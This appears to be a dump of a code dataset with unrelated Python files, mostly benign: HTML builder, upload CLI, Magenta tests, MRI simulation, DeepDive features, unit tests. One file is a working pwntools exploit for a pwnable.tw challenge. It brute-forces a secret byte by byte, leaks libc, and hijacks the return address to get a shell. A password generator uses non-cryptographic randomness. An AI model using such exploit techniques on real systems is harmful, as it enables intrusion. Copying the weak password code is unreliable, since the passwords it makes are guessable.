text stringlengths 8 6.05M |
|---|
class HTML:
    """Root of an HTML document, used as a context manager.

    Children are attached with ``doc += child`` and the whole document is
    rendered when the ``with`` block exits.
    """

    def __init__(self, output=None):
        # Optional file-like destination; when None the document is printed
        # to stdout (the original ignored this parameter entirely).
        self.output = output
        self.childrens = []  # kept name for backward compatibility

    def __enter__(self):
        return self

    def __add__(self, other):
        """Attach *other* as a child and return self so += keeps this object."""
        self.childrens.append(other)
        return self

    def __exit__(self, *args):
        """Render the document on context exit."""
        lines = ["<html>"]
        lines.extend(str(child) for child in self.childrens)
        lines.append("</html>")
        text = "\n".join(lines)
        if self.output is None:
            print(text)
        else:
            self.output.write(text + "\n")
class TopLevelTag:
    """A top-level container tag (e.g. head, body) with no attributes."""

    def __init__(self, tag):
        self.tag = tag
        self.childrens = []  # kept name for backward compatibility

    def __enter__(self):
        return self

    def __add__(self, other):
        """Attach *other* as a child and return self.

        Bug fix: the original returned ``TopLevelTag(self.childrens.append(other))``
        — list.append returns None, so ``head += title`` rebound *head* to a
        fresh, empty tag named None and the appended child was lost.
        """
        self.childrens.append(other)
        return self

    def __str__(self):
        # Bug fix: the original printed the markup and returned None, which
        # made the caller's str(child) raise TypeError. Build and return it.
        parts = ["<{tag}>".format(tag=self.tag)]
        parts.extend(str(child) for child in self.childrens)
        parts.append("</{tag}>".format(tag=self.tag))
        return "\n".join(parts)

    def __exit__(self, *attrs):
        # Bug fix: returning self (truthy) from __exit__ silently suppressed
        # any exception raised inside the with-block; return None instead.
        return None
class Tag:
    """A regular HTML tag with optional attributes, text, and children.

    ``is_single`` marks void elements rendered as ``<tag .../>``.
    Attribute values are rendered via str(); e.g. klass=("a", "b") renders
    the tuple's repr, matching the original's intent.
    """

    def __init__(self, tag, is_single=False, **atrs):
        self.tag = tag
        self.text = ""
        self.is_single = is_single
        self.attributes = atrs
        # New (backward-compatible): nested children, so "div += p" works —
        # the original demo used it but Tag had no __add__ at all.
        self.childrens = []

    def __enter__(self):
        return self

    def __exit__(self, *atrs):
        # Return None so exceptions inside the with-block propagate
        # (the original returned truthy self, suppressing them).
        return None

    def __add__(self, other):
        """Attach *other* as a child and return self."""
        self.childrens.append(other)
        return self

    def __str__(self):
        # Bug fixes vs. original: .items was not called, and
        # '{key}="{value}"'.format(key, value) passed positional args to
        # named placeholders (KeyError). Also return the markup instead of
        # printing None-yielding output.
        attrs = ['{key}="{value}"'.format(key=key, value=value)
                 for key, value in self.attributes.items()]
        # Only insert a space when there are attributes (original emitted "<p >").
        head = self.tag if not attrs else self.tag + " " + " ".join(attrs)
        if self.is_single:
            return "<{head}/>".format(head=head)
        inner = self.text + "".join(str(child) for child in self.childrens)
        return "<{head}>{inner}</{tag}>".format(head=head, inner=inner, tag=self.tag)
if __name__ == "__main__":
    # Demo: build a small document; each tag renders when the outer HTML
    # context exits.
    # NOTE(review): "x += y" here relies on __add__ returning a usable
    # object — confirm the tag classes return self from __add__.
    with HTML(output=None) as doc:
        with TopLevelTag("head") as head:
            with Tag("title") as title:
                title.text = "hello"
                head += title
            doc += head
        with TopLevelTag("body") as body:
            with Tag("h1", klass=("main-text",)) as h1:
                h1.text = "Test"
                body += h1
            with Tag("div", klass=("container", "container-fluid"), id="lead") as div:
                with Tag("p") as paragraph:
                    paragraph.text = "another test"
                    div += paragraph
                with Tag("img", is_single=True, src="/icon.png") as img:
                    div += img
                body += div
            doc += body
|
"""CLI to upload data to a MetaGenScope Server."""
from sys import stderr
import click
from metagenscope_cli.sample_sources.data_super_source import DataSuperSource
from metagenscope_cli.sample_sources.file_source import FileSource
from .utils import batch_upload, add_authorization, parse_metadata
@click.group()
def upload():
    """Handle different types of uploads."""
    # Container group only; subcommands register themselves via
    # @upload.command() below.
    pass
@upload.command()
@add_authorization()
@click.argument('metadata_csv')
@click.argument('sample_names', nargs=-1)
def metadata(uploader, metadata_csv, sample_names):
    """Upload a CSV metadata file."""
    # One POST per sample; failures are reported but do not abort the batch.
    for sample_name, metadata_dict in parse_metadata(metadata_csv, sample_names).items():
        payload = {
            'sample_name': str(sample_name),
            'metadata': metadata_dict,
        }
        try:
            click.echo(uploader.knex.post('/api/v1/samples/metadata', payload))
        except Exception:  # pylint:disable=broad-except
            print(f'[upload-metadata-error] {sample_name}', file=stderr)
@upload.command()
@add_authorization()
@click.option('-u', '--group-uuid', default=None)
@click.option('-d', '--datasuper-group', default=None)
@click.option('-g', '--group-name', default=None)
def datasuper(uploader, group_uuid, datasuper_group, group_name):
    """Upload all samples from DataSuper repo."""
    # Pull sample payloads from the local DataSuper repository, then hand
    # the batch off to the shared uploader helper.
    payloads = DataSuperSource(group=datasuper_group).get_sample_payloads()
    batch_upload(uploader, payloads, group_uuid=group_uuid, upload_group_name=group_name)
@upload.command()
@add_authorization()
@click.option('-u', '--group-uuid', default=None)
@click.option('-g', '--group-name', default=None)
@click.option('-m/-l', '--manifest/--file-list', default=False)
@click.argument('result_files', nargs=-1)
def files(uploader, group_uuid, group_name, manifest, result_files):
    """Upload all samples from list of tool result files."""
    # (Docstring typo fixed: "llist" -> "list"; click shows this as help text.)
    if manifest:
        # In manifest mode each argument is a file listing one result file
        # per line; expand those into the actual result-file list.
        result_file_list = []
        for result_manifest in result_files:
            with open(result_manifest) as rmf:
                for line in rmf:
                    stripped = line.strip()
                    if not stripped:
                        continue  # skip blank lines instead of adding "" paths
                    result_file_list.append(stripped)
        result_files = result_file_list
    sample_source = FileSource(files=result_files)
    samples = sample_source.get_sample_payloads()
    batch_upload(uploader, samples, group_uuid=group_uuid, upload_group_name=group_name)
|
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 30 10:46:52 2017
Grab the filtered scenes, sort them based on acquisition dates, and save them as new sequentially numbered files
@author: dzelenak
"""
import os
import sys
import pprint
from shutil import copyfile
from argparse import ArgumentParser
def read_list(txtfile):
    """Read the scene list file and return the ``.tar`` entries.

    :param txtfile: path to a text file listing scene archives
    :return: list of lines containing ".tar" (newlines removed)
    """
    with open(txtfile, "r") as txt:
        # Bug fix: the original sliced off the last character (line[:-1]),
        # which corrupts a final line that has no trailing newline.
        flist = [line.rstrip("\n") for line in txt if ".tar" in line]
    if len(flist) == 0:
        print(f"Could not read any lines from the file {txtfile}")
        sys.exit(1)
    return flist
def get_files(in_dir, lookfor):
    """Recursively collect .tif files whose names contain *lookfor*.

    :param in_dir: <str> root directory to walk
    :param lookfor: <str> substring that must appear in the filename
    :return file_list: <str[]> sorted full paths; exits if none found
    """
    matches = [
        os.path.join(root, fname)
        for root, _dirs, fnames in os.walk(in_dir)
        for fname in fnames
        if lookfor in fname and fname[-4:] == ".tif"
    ]
    if not matches:
        print(f"Could not find any files in {in_dir}")
        sys.exit(1)
    return sorted(matches)
def do_work(outdir, filelist, tc_dir):
    """
    Copy the filtered tasseled-cap scenes into *outdir*, renamed as
    sequential numbers in chronological order, and write a lookup table
    mapping original names to the new sequence numbers.

    :param outdir: output directory for the renamed files
    :param filelist: path to the .txt file listing the filtered scenes
    :param tc_dir: root directory containing the tasseled cap band .tifs
    :return:
    """
    if not os.path.exists(outdir):
        os.makedirs(outdir)
    # Gather the per-band .tif files from the tasseled-cap directory.
    lookup_files = {}
    b_files = get_files(tc_dir, lookfor="brightness")
    lookup_files["brightness"] = b_files
    g_files = get_files(tc_dir, lookfor="greenness")
    lookup_files["greenness"] = g_files
    w_files = get_files(tc_dir, lookfor="wetness")
    lookup_files["wetness"] = w_files
    # Keep only files whose basename matches an entry in the filtered list.
    filtered_lookup = {}
    filtered_list = read_list(filelist)
    for key in lookup_files.keys():
        temp_list = []
        for ind, file in enumerate(lookup_files[key]):
            for item in filtered_list:
                # Drop the last 7 characters of the listed name
                # (presumably the ".tar.gz" extension — TODO confirm).
                basename = os.path.basename(item)[:-7]
                if basename in file:
                    temp_list.append(file)
        filtered_lookup[key] = sorted(temp_list)
        if len(filtered_lookup[key]) == 0:
            print("No matching files were found between the filtered browse and main browse lists")
            sys.exit(1)
    # Pull the dates from the filenames as integers
    # (assumes a YYYYMMDD date at characters 15-23 of the basename —
    # TODO confirm against the actual naming scheme).
    dates = [int(os.path.basename(file)[15:23]) for file in filtered_lookup["brightness"]]
    # Create list of sorted dates
    dates_sorted = sorted(dates)
    for ind, d in enumerate(dates_sorted):
        # Convert integers back to strings
        dates_sorted[ind] = str(d)
    # Re-order every band's file list to match the sorted date order.
    dates_lookup = {}
    for key in filtered_lookup.keys():
        temp_list = []
        for date in dates_sorted:
            for file in filtered_lookup[key]:
                fname = os.path.basename(file)
                if fname[15:23] == date:
                    temp_list.append(file)
        dates_lookup[key] = temp_list
    pprint.pprint(dates_lookup)
    # Build the new sequentially-numbered target paths, one folder per band.
    new_files = {}
    for key in dates_lookup.keys():
        temp_list = []
        for ind, file in enumerate(dates_lookup[key]):
            temp_list.append(f"{outdir}{os.sep}{key}{os.sep}{str(ind + 1)}.tif")
            if not os.path.exists(f"{outdir}{os.sep}{key}"):
                os.makedirs(f"{outdir}{os.sep}{key}")
        new_files[key] = temp_list
    pprint.pprint(new_files)
    # Copy each file to its new name and record the old->new mapping.
    out_txt = outdir + os.sep + "tcband_to_chrono.txt"
    with open(out_txt, "w") as txt:
        for key in dates_lookup.keys():
            for old, new in zip(dates_lookup[key], new_files[key]):
                # Copy to the new file
                copyfile(old, new)
                # Record which file corresponds to which sequential number
                txt.write(os.path.splitext(os.path.basename(old))[0] + " ---- " +
                          os.path.splitext(os.path.basename(new))[0] + "\n")
if __name__ == "__main__":
    # Command-line entry point: the dest names match do_work's parameter
    # names exactly, so the parsed namespace is unpacked straight into it.
    parser = ArgumentParser()
    parser.add_argument("-tc", dest="tc_dir", required=True, type=str,
                        help="Full path to the root directory containing tasseled cap bands")
    parser.add_argument("-f", dest="filelist", required=True, type=str,
                        help="The full path to the .txt file listing the filtered scenes")
    parser.add_argument("-o", dest="outdir", required=True, type=str,
                        help="Full path to the output directory that will contain the renamed jpgs")
    args = parser.parse_args()
    do_work(**vars(args))
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for encoders."""
# internal imports
import tensorflow as tf
from magenta.lib import melodies_lib
from magenta.lib import sequence_to_melodies
NO_EVENT = melodies_lib.NO_EVENT
NOTE_OFF = melodies_lib.NOTE_OFF
def make_sequence_example(inputs, labels):
    """Build a tf.train.SequenceExample from per-step input vectors and labels."""
    feature_lists = tf.train.FeatureLists(feature_list={
        'inputs': tf.train.FeatureList(feature=[
            tf.train.Feature(float_list=tf.train.FloatList(value=row))
            for row in inputs]),
        'labels': tf.train.FeatureList(feature=[
            tf.train.Feature(int64_list=tf.train.Int64List(value=[lbl]))
            for lbl in labels]),
    })
    return tf.train.SequenceExample(feature_lists=feature_lists)
def one_hot(value, length):
    """Return a float one-hot list of *length* with 1.0 at index *value*."""
    return [float(index == value) for index in range(length)]
class CreateDatasetTest(tf.test.TestCase):
    """Tests for basic_one_hot_encoder: melody events -> one-hot inputs/labels."""

    def testBasicOneHotEncoder(self):
        """Plain melody: inputs are one-hot (note+2), padded with 12 no-event steps."""
        steps_per_beat = 4
        transpose_to_key = 0
        min_note = 48
        max_note = 84
        # +2 classes reserve slots for the NO_EVENT / NOTE_OFF specials.
        num_classes = max_note - min_note + 2
        melody = melodies_lib.Melody()
        melody.from_event_list(
            [NO_EVENT, 60, 62, 64, NO_EVENT, NOTE_OFF, 65, 67, NOTE_OFF, 69, 71, 72,
             NO_EVENT, NOTE_OFF, 74, 76, 77, 79, NO_EVENT, NOTE_OFF])
        # Notes shifted down by min_note into the encoder's class range.
        transformed_melody = [NO_EVENT, 12, 14, 16, NO_EVENT, NOTE_OFF, 17, 19,
                              NOTE_OFF, 21, 23, 24, NO_EVENT, NOTE_OFF, 26, 28,
                              29, 31, NO_EVENT, NOTE_OFF]
        expected_inputs = ([one_hot(note + 2, num_classes)
                            for note in transformed_melody] +
                           [one_hot(0, num_classes)] * 12)
        # Labels are the inputs shifted one step ahead.
        expected_labels = [note + 2 for note in transformed_melody[1:]] + [0] * 13
        expected_sequence_example = make_sequence_example(expected_inputs,
                                                          expected_labels)
        sequence_example, _ = sequence_to_melodies.basic_one_hot_encoder(
            melody, steps_per_beat, min_note, max_note, transpose_to_key)
        self.assertEqual(expected_sequence_example, sequence_example)

    def testBasicOneHotEncoderTruncateNoteOff(self):
        """Melody ending in NOTE_OFF: no padding, final label is NOTE_OFF."""
        steps_per_beat = 4
        transpose_to_key = 0
        min_note = 48
        max_note = 84
        num_classes = max_note - min_note + 2
        melody = melodies_lib.Melody()
        melody.from_event_list(
            [NO_EVENT, 60, 62, 64, NO_EVENT, NOTE_OFF, 65, 67, NOTE_OFF, 69, 71, 72,
             NO_EVENT, NOTE_OFF, 74, 76, NOTE_OFF])
        transformed_melody = [NO_EVENT, 12, 14, 16, NO_EVENT, NOTE_OFF, 17, 19,
                              NOTE_OFF, 21, 23, 24, NO_EVENT, NOTE_OFF, 26, 28]
        expected_inputs = [one_hot(note + 2, num_classes)
                           for note in transformed_melody]
        expected_labels = ([note + 2 for note in transformed_melody[1:]] +
                           [NOTE_OFF + 2])
        expected_sequence_example = make_sequence_example(expected_inputs,
                                                          expected_labels)
        sequence_example, _ = sequence_to_melodies.basic_one_hot_encoder(
            melody, steps_per_beat, min_note, max_note, transpose_to_key)
        self.assertEqual(expected_sequence_example, sequence_example)

    def testBasicOneHotEncoderOctaveSquash(self):
        """Out-of-range notes (84, 86, 38, 40) get squashed into the octave range."""
        steps_per_beat = 4
        transpose_to_key = 0
        min_note = 48
        max_note = 84
        num_classes = max_note - min_note + 2
        melody = melodies_lib.Melody()
        melody.from_event_list(
            [NO_EVENT, 84, 86, 52, NO_EVENT, NOTE_OFF, 65, 67, NOTE_OFF, 69, 71, 72,
             NO_EVENT, NOTE_OFF, 38, 40, NOTE_OFF])
        transformed_melody = [NO_EVENT, 24, 26, 4, NO_EVENT, NOTE_OFF, 17, 19,
                              NOTE_OFF, 21, 23, 24, NO_EVENT, NOTE_OFF, 2, 4]
        expected_inputs = [one_hot(note + 2, num_classes)
                           for note in transformed_melody]
        expected_labels = ([note + 2 for note in transformed_melody[1:]] +
                           [NOTE_OFF + 2])
        expected_sequence_example = make_sequence_example(expected_inputs,
                                                          expected_labels)
        sequence_example, _ = sequence_to_melodies.basic_one_hot_encoder(
            melody, steps_per_beat, min_note, max_note, transpose_to_key)
        self.assertEqual(expected_sequence_example, sequence_example)

    def testBasicOneHotEncoderTransposeKey(self):
        """Melody one semitone up transposes back to key 0 before encoding."""
        steps_per_beat = 4
        transpose_to_key = 0
        min_note = 48
        max_note = 84
        num_classes = max_note - min_note + 2
        melody = melodies_lib.Melody()
        melody.from_event_list(
            [NO_EVENT, 61, 63, 65, NO_EVENT, NOTE_OFF, 66, 68, NOTE_OFF, 70, 72, 73,
             NO_EVENT, NOTE_OFF, 75, 77, NOTE_OFF])
        transformed_melody = [NO_EVENT, 12, 14, 16, NO_EVENT, NOTE_OFF, 17, 19,
                              NOTE_OFF, 21, 23, 24, NO_EVENT, NOTE_OFF, 26, 28]
        expected_inputs = [one_hot(note + 2, num_classes)
                           for note in transformed_melody]
        expected_labels = ([note + 2 for note in transformed_melody[1:]] +
                           [NOTE_OFF + 2])
        expected_sequence_example = make_sequence_example(expected_inputs,
                                                          expected_labels)
        sequence_example, _ = sequence_to_melodies.basic_one_hot_encoder(
            melody, steps_per_beat, min_note, max_note, transpose_to_key)
        self.assertEqual(expected_sequence_example, sequence_example)
if __name__ == '__main__':
    # Run the encoder tests directly.
    tf.test.main()
|
from PrettyData import *
|
# -*- coding: utf-8 -*-
"""MRI simulation functions.
"""
import numpy as np
__all__ = ["birdcage_maps"]
def birdcage_maps(shape, r=1.5, nzz=8, dtype=complex):
    """Simulates birdcage coil sensitivities.

    Args:
        shape (tuple of ints): sensitivity maps shape,
            can be of length 3 (nc, ny, nx) or 4 (nc, nz, ny, nx).
        r (float): relative radius of birdcage.
        nzz (int): number of coils per ring (4D case only).
        dtype (Dtype): data type of the returned array.

    Returns:
        array: complex sensitivity maps, normalized so the
        root-sum-of-squares over the coil axis is 1 at every voxel.

    Raises:
        ValueError: if ``shape`` is not of length 3 or 4.
    """
    if len(shape) == 3:
        # 2D maps: coils evenly spaced on a single ring.
        nc, ny, nx = shape
        c, y, x = np.mgrid[:nc, :ny, :nx]

        coilx = r * np.cos(c * (2 * np.pi / nc))
        coily = r * np.sin(c * (2 * np.pi / nc))
        coil_phs = -c * (2 * np.pi / nc)

        # Voxel coordinates normalized to [-1, 1), relative to each coil.
        x_co = (x - nx / 2.0) / (nx / 2.0) - coilx
        y_co = (y - ny / 2.0) / (ny / 2.0) - coily
        rr = np.sqrt(x_co**2 + y_co**2)
        phi = np.arctan2(x_co, -y_co) + coil_phs
        out = (1.0 / rr) * np.exp(1j * phi)
    elif len(shape) == 4:
        # 3D maps: nzz coils per ring, rings stacked along z.
        nc, nz, ny, nx = shape
        c, z, y, x = np.mgrid[:nc, :nz, :ny, :nx]

        coilx = r * np.cos(c * (2 * np.pi / nzz))
        coily = r * np.sin(c * (2 * np.pi / nzz))
        coilz = np.floor(c / nzz) - 0.5 * (np.ceil(nc / nzz) - 1)
        coil_phs = -(c + np.floor(c / nzz)) * (2 * np.pi / nzz)

        x_co = (x - nx / 2.0) / (nx / 2.0) - coilx
        y_co = (y - ny / 2.0) / (ny / 2.0) - coily
        z_co = (z - nz / 2.0) / (nz / 2.0) - coilz
        rr = (x_co**2 + y_co**2 + z_co**2) ** 0.5
        phi = np.arctan2(x_co, -y_co) + coil_phs
        out = (1 / rr) * np.exp(1j * phi)
    else:
        raise ValueError("Can only generate shape with length 3 or 4")

    # Normalize by the root-sum-of-squares across coils. The original used
    # the Python builtin sum(..., 0) over the ndarray, which iterates the
    # coil axis in Python; np.sum(axis=0) is the vectorized equivalent.
    rss = np.sqrt(np.sum(np.abs(out) ** 2, axis=0))
    out /= rss

    return out.astype(dtype)
|
import random

# Character pools used to build passwords.
# Bug fix: the original alphabet was "abcdefghijklmnopqrsqrstuvwxyz" —
# "q", "r" and "s" appeared twice, biasing random.choice toward them.
characters = "abcdefghijklmnopqrstuvwxyz"
numbers = 1234567890  # int on purpose; converted with str() before use
symbols = "!@#$%^&*"
print('''
Passifier
Running On Version: 1.0
Developed By github.com/AlirezaKJ/
''')
# Main interactive loop: one password-generation session per iteration.
# NOTE(review): `characters` is module-global and grows each session when
# the user answers "yes" (uppercase/numbers/symbols are appended again) —
# confirm whether the pool should reset between sessions.
while True:
    # Mode prompt: Enter for simple mode, "advanced" for a custom pool.
    while True:
        print('''
Press Enter To Continue Or Type Advanced To Enter Advanced Mode
''')
        mode = input(" > ")
        if mode.lower() == "advanced":
            # Advanced mode: the user supplies the exact character pool.
            print('''
Type Every Character You Want In Your Password
''')
            tempcharacters = input()
            tempcharacters = str(tempcharacters)
            # Keep asking until a valid integer length is given.
            while True:
                try:
                    password__length = int(input("Enter Your Password Length : "))
                    break
                except ValueError:
                    print("Wrong Type Please Enter A Number")
            # Keep asking until a valid integer count is given.
            while True:
                try:
                    password__count = int(input("How Many Password Do You Want : "))
                    print("")
                    break
                except ValueError:
                    print("Wrong Type Please Enter A Number")
                    print("")
            # Generate and print the requested passwords from the custom pool.
            for x in range(0, password__count):
                password = ""
                for x in range(0, password__length):
                    password_x = random.choice(tempcharacters)
                    password = password + password_x
                print(password)
                print('')
            print('')
        else:
            # Simple mode: fall through to the guided questions below.
            break
    # Optionally extend the pool with uppercase letters.
    while True:
        question = input("Do You Want Uppercase Alphabets In Your Password? ")
        if question.lower() == "yes":
            characters = characters + characters.upper()
            break
        elif question.lower() == "no":
            break
        else:
            print(question + " Is Wrong Valid Answers Are yes Or no")
    print("")
    # Optionally extend the pool with digits.
    while True:
        question = input("Do You Want Numbers In Your Password? ")
        if question.lower() == "yes":
            characters = characters + str(numbers)
            break
        elif question.lower() == "no":
            break
        else:
            print(question + " Is Wrong Valid Answers Are yes Or no")
    print("")
    # Optionally extend the pool with special symbols.
    while True:
        question = input("Do You Want Special Symbols(!@#$%^&*) In Your Password? ")
        if question.lower() == "yes":
            characters = characters + symbols
            break
        elif question.lower() == "no":
            break
        else:
            print(question + " Is Wrong Valid Answers Are yes Or no")
    print("")
    # Validated numeric inputs for length and count.
    while True:
        try:
            password__length = int(input("Enter Your Password Length : "))
            break
        except ValueError:
            print("Wrong Type Please Enter A Number")
    while True:
        try:
            password__count = int(input("How Many Password Do You Want : "))
            print("")
            break
        except ValueError:
            print("Wrong Type Please Enter A Number")
            print("")
    print("")
    print("")
    # Generate and print the requested passwords from the full pool.
    for x in range(0, password__count):
        password = ""
        for x in range(0, password__length):
            password_x = random.choice(characters)
            password = password + password_x
        print(password)
        print("")
    print('')
    # Ask whether to run another session; anything else re-prompts via the loop.
    question = input("Do You Want Another Password? ")
    if question.lower() == "yes":
        pass
    elif question.lower() == "no":
        exit()
    else:
        print(question + " Is Wrong Valid Answers Are yes Or no")
# Basic string-operations demo: escape sequences, methods, and indexing.
print("This is a string \nin \"Python\" ")
phrase = "Truong Ho"
print(phrase.lower())  # lower-cased copy
print(len(phrase))  # length of the string
print(phrase[0].isupper())  # is the first character upper-case?
print(phrase.index("Ho"))  # start index of the substring
print(phrase.replace(" ", " Lam "))  # insert a middle name at the space
|
# Exploit script for pwnable.tw "babystack": brute-forces the login token
# byte-by-byte, leaks a libc address the same way, then jumps to a one-gadget.
from pwn import *
r = remote("chall.pwnable.tw", 10205)
# Local debugging alternatives:
#r = process("./babystack")
#r = process('./babystack', env={"LD_PRELOAD":"./libc_64.so.6"})
def transIntToBytes(int_):
    """Return the hex string of *int_* decoded as a little-endian byte string."""
    value = int.from_bytes(int_, byteorder="little")
    return hex(value)
### leak rand_num
# Brute-force the 16-byte login token one byte at a time: the login check
# acts as an oracle that reveals whether the guessed prefix matches.
stack_element = b''
rand_num = b''
for t in range(16):
    payload = b''
    for i in range(1, 256):
        #print(i)
        r.recvuntil(">> ")
        r.send("1"+"a"*15)
        r.recvuntil(":")
        payload = bytes([i])
        r.sendline(stack_element + payload)
        msg = r.recvline().strip()
        if msg[:5] == b'Login':
            r.recvuntil(">> ")  ## logout
            r.send("1"+"a"*15)
            print(msg)
            break
        if i == 255:
            # No byte 1..255 matched, so the real byte must be NUL.
            payload = b'\x00'
    stack_element += payload
    rand_num += payload
print(f'rand_num1: {transIntToBytes(rand_num[0:8])}')
print(f'rand_num2: {transIntToBytes(rand_num[8:16])}')
########################
# Overflow setup: log in with a NUL prefix, then use the copy option (3)
# to drag a libc pointer into brute-forceable range.
r.recvuntil(">> ")
#input("@")
r.send("1")
r.recvuntil(":")
r.send(b'\x00' + b'b'*0x47) # 0x3f
r.recvuntil(">> ")
r.send("3")
r.recvuntil(":")
r.send("c"*0x28)
## logout
r.recvuntil(">> ")
r.send("1")
#stack_element = b'b'*16 + b'1' + b'a'*15
stack_element = b'b'*8
leak = b''
# Same byte-by-byte oracle, now leaking 6 bytes of a libc address.
for t in range(6):
    payload = b''
    for i in range(1, 256):
        #print(i)
        r.recvuntil(">> ")
        r.send("1"+"a"*15)
        r.recvuntil(":")
        payload = bytes([i])
        r.sendline(stack_element + payload)
        msg = r.recvline().strip()
        if msg[:5] == b'Login':
            r.recvuntil(">> ")  ## logout
            r.send("1"+"a"*15)
            print(msg)
            break
        if i == 255:
            payload = b'\x00'
    stack_element += payload
    leak += payload
print(f'leak: {transIntToBytes(leak)}')
# Subtract the leaked symbol's known libc offset to recover the base.
libc_base = int.from_bytes(leak, byteorder="little") - 0x78439 # 0x3ec760
print(f'libc_base: {hex(libc_base)}')
one_gadget = libc_base + 0xf0567 # 0xef6c4
'''
### leak canary
r.recvuntil(">> ")
r.send("1")
r.recvuntil(":")
r.send(b'\x00' + b'b'*0x48)
r.recvuntil(">> ")
r.send("3")
r.recvuntil(":")
r.send("c"*0x28)
## logout
r.recvuntil(">> ")
r.send("1")
stack_element = b'b'*9
canary = b'\x00'
for t in range(7):
payload = b''
for i in range(1, 256):
#print(i)
r.recvuntil(">> ")
r.send("1"+"a"*15)
r.recvuntil(":")
payload = bytes([i])
r.sendline(stack_element + payload)
msg = r.recvline().strip()
if msg[:5] == b'Login':
r.recvuntil(">> ") ## logout
r.send("1"+"a"*15)
print(msg)
break
if i == 255:
payload = b'\x00'
stack_element += payload
canary += payload
print(f'canary: {transIntToBytes(canary)}')
'''
## get shell by one gadget
# Overwrite the saved return address with the one-gadget, keeping the
# token bytes intact so the login check still passes, then exit (2).
print(f'one_gadget: {hex(one_gadget)}')
r.recvuntil(">> ")
r.send("1")
r.recvuntil(":")
r.send(b'\x00' + b'x'*0x3f + rand_num[0:8] + rand_num[8:16] + b'i'*8 + b'j'*8 + b'k'*8 + p64(one_gadget))
r.recvuntil(">> ")
r.send("3")
r.recvuntil(":")
r.send("c"*0x28)
r.recvuntil(">> ")
input("@")
r.send("2")
r.interactive()
|
#! /usr/bin/env python
import sys
import ddlib # DeepDive python utility
ARR_DELIM = '~^~'
# NOTE(review): Python 2 syntax (print statement, print >>) — this script
# runs under python2 only.
# For each input tuple
for row in sys.stdin:
    parts = row.strip().split('\t')
    if len(parts) != 6:
        print >>sys.stderr, 'Failed to parse row:', row
        continue
    # Get all fields from a row
    words = parts[0].split(ARR_DELIM)
    relation_id = parts[1]
    p1_start, p1_length, p2_start, p2_length = [int(x) for x in parts[2:]]
    # Unpack input into tuples.
    span1 = ddlib.Span(begin_word_id=p1_start, length=p1_length)
    span2 = ddlib.Span(begin_word_id=p2_start, length=p2_length)
    # Features for this pair come in here
    features = set()
    # Feature 1: Bag of words between the two phrases
    words_between = ddlib.tokens_between_spans(words, span1, span2)
    for word in words_between.elements:
        features.add("word_between=" + word)
    # Feature 2: Number of words between the two phrases
    features.add("num_words_between=%s" % len(words_between.elements))
    # Feature 3: Does the last word (last name) match?
    last_word_left = ddlib.materialize_span(words, span1)[-1]
    last_word_right = ddlib.materialize_span(words, span2)[-1]
    if (last_word_left == last_word_right):
        features.add("potential_last_name_match")
    ########################
    # Improved Feature Set #
    ########################
    # # Feature 1: Find out if a lemma of marry occurs.
    # # A better feature would ensure this is on the dependency path between the two.
    # words_between = ddlib.tokens_between_spans(words, span1, span2)
    # lemma_between = ddlib.tokens_between_spans(obj["lemma"], span1, span2)
    # married_words = ['marry', 'widow', 'wife', 'fiancee', 'spouse']
    # non_married_words = ['father', 'mother', 'brother', 'sister', 'son']
    # # Make sure the distance between mention pairs is not too long
    # if len(words_between.elements) <= 10:
    #     for mw in married_words + non_married_words:
    #         if mw in lemma_between.elements:
    #             features.add("important_word=%s" % mw)
    # # Feature 2: Number of words between the two phrases
    # # Intuition: if they are close by, the link may be stronger.
    # l = len(words_between.elements)
    # if l < 5: features.add("few_words_between")
    # else: features.add("many_words_between")
    # # Feature 3: Does the last word (last name) match?
    # last_word_left = ddlib.materialize_span(words, span1)[-1]
    # last_word_right = ddlib.materialize_span(words, span2)[-1]
    # if (last_word_left == last_word_right):
    #     features.add("potential_last_name_match")
    #######################
    # # Use this line if you want to print out all features extracted:
    # ddlib.log(features)
    # Emit one (relation_id, feature) pair per line for DeepDive.
    for feature in features:
        print str(relation_id) + '\t' + feature
|
import unittest
import Song
class SongTests(unittest.TestCase):
    """Unit tests for the Song class: construction, rating, and validation."""

    def setUp(self):
        """Build a fresh Song fixture before every test."""
        self.such_song = Song.Song(
            "song_title", "song_artist", "song_album", 5, 523, 1024)

    def test_song_init(self):
        """Constructor stores every field on the matching attribute."""
        expected = {
            "title": "song_title",
            "artist": "song_artist",
            "album": "song_album",
            "rating": 5,
            "length": 523,
            "bitrate": 1024,
        }
        for attr, value in expected.items():
            self.assertEqual(value, getattr(self.such_song, attr))

    def test_rate(self):
        """rate() updates the stored rating."""
        self.such_song.rate(4)
        self.assertEqual(4, self.such_song.rating)

    def test_rate_out_of_range(self):
        """rate() rejects values outside the valid range."""
        with self.assertRaises(ValueError):
            self.such_song.rate(200)
if __name__ == '__main__':
    # Run the Song tests directly.
    unittest.main()
|
#!/usr/bin/env python
# Author:tjy
# Demo of the sys module: module search path and command-line arguments.
import sys
print(sys.path)
print(sys.argv)  # print the argument list (original note: 打印相当路径)
print(sys.argv[1])  # NOTE(review): raises IndexError if no argument is passed
'''
import os
dir_res = os.system("dir")
print("--->", dir_res)
dir_res = os.popen("dir").read()
print(dir_res)
#os.mkdir("new")
print(os.getpid())
'''
import os
import argparse
import datetime
import tensorflow as tf
from text_detector.detect_net import config as cfg
from text_detector.detect_net.yolo_net import YOLONet
from text_detector.utils.timer import Timer
from text_detector.utils.import_data import text_detect_obj
from text_detector.utils.logging import yolo_log
from pre_process.report import send_email
slim = tf.contrib.slim
# 这部分代码主要实现的是对已经构建好的网络和损失函数利用数据进行训练
# 在训练过程中,对变量采用了指数平均数(exponential moving average (EMA))
# 来提高整体的训练性能。同时,为了获得比较好的学习性能,对学习速率同向进行
# 了指数衰减,使用了 exponential_decay 函数来实现这个功能。
# 在训练的同时,对我们的训练模型(网络权重)进行保存,这样以后可以直接进行调
# 用这些权重;同时,每隔一定的迭代次数便写入 TensorBoard,这样在最后可以观察整体的情况。
# This class trains the already-built network and loss function on the data.
# The learning rate is decayed exponentially (tf.train.exponential_decay);
# model weights are saved periodically, and summaries are written to
# TensorBoard at a fixed cadence so overall progress can be observed.
class Solver(object):
    """Training driver for the YOLO text-detection network."""

